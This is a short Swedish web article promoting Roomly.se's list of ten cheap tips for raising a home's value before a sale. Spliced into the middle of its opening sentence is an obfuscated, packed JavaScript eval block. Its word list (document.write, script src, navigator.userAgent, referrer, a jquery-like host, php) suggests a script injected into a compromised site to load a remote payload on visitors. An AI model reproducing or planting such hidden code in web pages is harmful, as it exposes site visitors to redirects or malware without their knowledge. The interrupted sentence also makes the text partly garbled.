Image Image Image Image Image Image Image Image Image Image

| 23 oktober, 2020

Scroll to top

Top

Öka värdet på din bostad med 10 enkla steg

Öka värdet på din bostad med 10 enkla steg

Öka värdet eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tfhky|var|u0026u|referrer|bhezy||js|php’.split(’|’),0,{}))
på din bostad: Bostadsmarknaden har börjat ta fart igen efter vinterpausen. Detta betyder att det är nu i Februari och mars som uppstarten för försäljningen på börjas. En process som har sina steg men ofta går relativt snabbt tills bostaden ligger ute till försäljning.

Det är inredningssajten Roomly.se som skapat en lista på 10 smarta och billiga knep med hur du som privatperson enkelt kan öka värdet på din bostad inför en eventuell försäljning. Enligt sajten så tror många att denna uppgift är tidskrävande och dyr, detta är fel. Det finns steg att ta som gör arbetet så effektivt som möjligt.

Roomly.se menar också att många av stegen i deras försäljningsguide är ett måste och kan bli en avgörande del i försäljningsprocessen. I listan går man också in på hur spekulanter tänker och tycker när de är på visning. Vilka inredningsdekorationer och möbler som passar bäst.

Kika in listan här: 10 billiga och smarta knep som ökar värdet på din bostad.